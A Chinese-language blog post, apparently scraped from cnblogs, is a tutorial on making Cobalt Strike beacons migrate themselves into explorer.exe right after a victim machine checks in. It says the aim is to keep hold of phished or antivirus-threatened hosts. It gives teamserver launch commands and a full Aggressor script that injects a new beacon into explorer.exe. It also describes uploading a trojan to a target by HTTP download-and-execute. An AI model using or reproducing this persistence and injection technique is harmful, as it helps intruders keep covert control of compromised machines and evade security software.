zoukankan      html  css  js  c++  java
  • Cobalt strike上线后自动迁移进程

    题记

        很久之前我看到公众号讲进程迁移的文章,cs上线机器如果你不知道上线时间的话很有可能机器刚上线就跑了(例如xss的flash钓鱼大法),在比如遇到杀软被杀的话,如果进程迁移的快很可能我们就成功了。所以这里研究一下cs上线机器自动进行进程迁移migrate。

    1 加载自定义 malleable C2配置文件

        下载地址:https://github.com/threatexpress/malleable-c2

        我的cs是4.2,所以我这里用的是4.2的配置文件。

    2 下载后放到cs服务器的位置

        这里注意我运行的时候爆出时间那块错误,我就把那块注释了,注释后成功运行。

      执行./teamserver 192.168.1.119 love jquery-c2.4.2.profile或者

      nohup ./teamserver 192.168.1.119 love jquery-c2.4.2.profile > /dev/null 2>&1 &

        还有别忘了设置迁移时间。

        修改后启动cs,成功启动。

    3 cs客户端配置cna插件

        把下面代码复制到cna文件中,然后放到cs客户端中即可。

    on beacon_initial
    
    {
    
    sub callback
    
    {
    
    $regex = '(.*
    )+explorer.exe	d+	(d+)(.*
    )+';
    
    $listener = "test";
    
    if ($2 ismatch $regex)
    
    {
    
    $pid = matched()[1];
    
    $inject_pid = $pid;
    
    if (-is64 $1)
    
    {
    
    $arch = "x64";
    
    }
    
    else
    
    {
    
    $arch = "x86";
    
    }
    
    binject($1, $pid, $listener, $arch);
    
    }
    
    }
    
    if($inject_pid != beacon_info($1,"pid"))
    
    {
    
    bps($1, &callback);
    
    }
    
    }

    4 生成木马上传到目标服务器

        这里我采用http传输下载执行。

        注意这里监听器的名对应cna脚本中的test,不用test迁移不了。

        设置完之后可见贼快,没多久就迁移并上线了。

    参考文章

        关于微信内置浏览器 达到持久控制:https://ailiqun.xyz/2021/04/18/%E8%B0%B7%E6%AD%8C%E6%B5%8F%E8%A7%88%E5%99%A8-v8-%E5%9C%A8%E5%BE%AE%E4%BF%A1%E4%B8%8A%E7%9A%84%E5%BA%94%E7%94%A8/

        C2lints实例演示:http://bilibili.com/read/cv7694558/

  • 相关阅读:
    回眸
    随想
    小序,良感
    润思
    网络爬虫的 “ 黑洞 ”
    Python——文件操作详解
    RandomAccessFile详解
    JSON数据解析及gson.jar包
    BigInteger详解
    Java爬虫——B站弹幕爬取
  • 原文地址:https://www.cnblogs.com/sunny11/p/14755923.html
Copyright © 2011-2022 走看看